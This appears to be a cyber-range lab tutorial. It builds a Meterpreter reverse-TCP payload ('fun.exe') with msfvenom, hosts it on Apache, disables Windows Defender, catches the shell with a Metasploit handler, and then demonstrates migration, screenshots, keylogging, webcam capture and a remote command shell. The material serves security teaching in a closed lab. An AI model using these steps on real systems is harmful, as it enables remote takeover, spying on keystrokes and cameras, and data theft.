A user who runs that file surrenders control of their computer.
The exact commands required vary for different cyber range setups, as detailed in previous projects.
ping 192.168.100.1
You should see replies, as
shown below:
sudo apt update
sudo apt install apache2 -y
sudo ss -lnt
You should see a listening process
on port 80,
as shown below:
http://192.168.100.1
You should see a Web page,
as
shown below:
On your Windows machine, in a Web browser, enter this address:
https://nmap.org/npcap/#download
Download and install the latest
Windows version, as shown below.
sudo apt install socat -y
socat TCP-LISTEN:4444,fork TCP:127.0.0.1:80
The terminal waits for a connection,
as shown below:
http://192.168.100.1:4444
You should see a Web page,
as shown below:
Once the test succeeds, on your Linux system, press Ctrl+C to stop socat.
Launch "Windows Defender".
At the top right, click Settings.
Turn off "Real-time protection", as shown below:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
Adjust the IP address to match the IP address of your Linux machine (the C&C server).
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.1 -f exe -o /var/www/html/fun.exe
sudo service apache2 start
The operation proceeds without errors,
as shown below.
sudo msfconsole -q
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit starts a
"reverse TCP handler",
as shown below.
http://192.168.100.1/fun.exe
Download the "fun.exe" file. Bypass any
warning boxes, double-click the file,
and allow it to run.
Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.
On your Linux machine, a meterpeter session opens, as shown below.
help
Several pages of help scroll by.
Several interesting commands
are available,
as shown below.
To become more persistent, we'll migrate to a process that will last longer.
To see a list of processes, at the meterpreter > prompt, execute this command:
ps
Let's migrate to the explorer process.
At the meterpreter > prompt, execute this command:
migrate -N explorer.exe
Migration is unreliable. It may succeed,
but it may time out. If it times out,
take these steps, as shown below:
exit
exploit
migrate -N explorer.exe
If you can't get it to work after a few tries, skip it and proceed to the next section.
screenshot
Gives you an image of the target's desktop keyscan_start
Begins capturing keys typed in the target. On the Windows target, open Notepad and type in some text, such as your name. keyscan_dump
Shows the keystrokes captured so far webcam_list
Shows the available webcams (if any) webcam_snap
Takes a photo with the webcam shell
Gives you a Windows Command Prompt on the target exit
Leaves the Windows Command Prompt
sysinfo
A list of network connections appears,
including one to a remote port of 4444,
as highlighted in the image below.
Notice the "Meterpreter" name for this connection, which is redacted in the image below.